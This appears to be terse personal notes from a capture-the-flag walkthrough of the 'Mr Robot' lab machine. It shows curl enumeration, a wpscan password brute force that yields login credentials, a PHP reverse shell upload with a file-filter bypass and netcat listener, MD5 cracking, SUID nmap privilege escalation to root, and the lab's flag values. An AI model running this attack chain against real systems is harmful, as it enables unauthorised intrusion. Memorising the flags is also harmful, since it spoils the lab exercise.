[+]ENUMERATION[+]
curl http://10.10.142.130/robots
fsocity.dic
flag1.txt


[+]FLAG 1[+]
curl http://10.10.142.130/key-1-of-3.txt > flag1.txt


[+]FLAG 2[+]
curl http://10.10.142.130/fsocity.dic > passwords.txt

[+]WPSCAN[+]
cat passwords.txt | wc -l
858160

sort passwords.txt | uniq > passwd.txt
cat passwd.txt | wc -l
11451


wpscan --url http://10.10.142.130/wp-login.php --usernames Elliot --passwords passwd.txt -t 100
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - Elliot / ER28-0652


http://10.10.155.198/wp-login.php
WordPress version 4.3.1 identified

CVE-2016-1564
Descripción
Múltiples vulnerabilidades de secuencias de comandos entre sitios (XSS) en wp-includes/class-wp-theme.php en WordPress antes de 4.4.1 permiten a los atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a través de un (1) nombre de hoja de estilo o (2) nombre de plantilla a wp-admin/customize.php.

[+]REVERSHELL[+]
Log in with credentials
user : Elliot
pass : ER28-0652

http://10.10.142.130/wp-admin/upload.php
upload revershell.php or // revershell.php.jpg for bypass filter img.

http://10.10.142.130/wp-content/uploads/2022/05/revershell.php
sudo nc -lvnp 4444


[+]daemon@linux:/$ whoami daemon[+]
daemon@linux:/$ hostname -I
10.10.142.130 

/etc/passwd
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:

daemon@linux:/home/robot$ ls
key-2-of-3.txt	password.raw-md5

daemon@linux:/home/robot$ cat password.raw-md5 
robot:c3fcd3d76192e4007dfb496cca67e13b

c3fcd3d76192e4007dfb496cca67e13b	md5	abcdefghijklmnopqrstuvwxyz


[+]PRIVILAGE ESCALATION[+]
daemon@linux:/home/robot$ find / -perm /4000 2>/dev/null
/usr/local/bin/nmap

daemon@linux:/usr/local/bin$ ./nmap --interactive
nmap> !sh
# whoami
root

cd /home/robot
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

cd /root
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
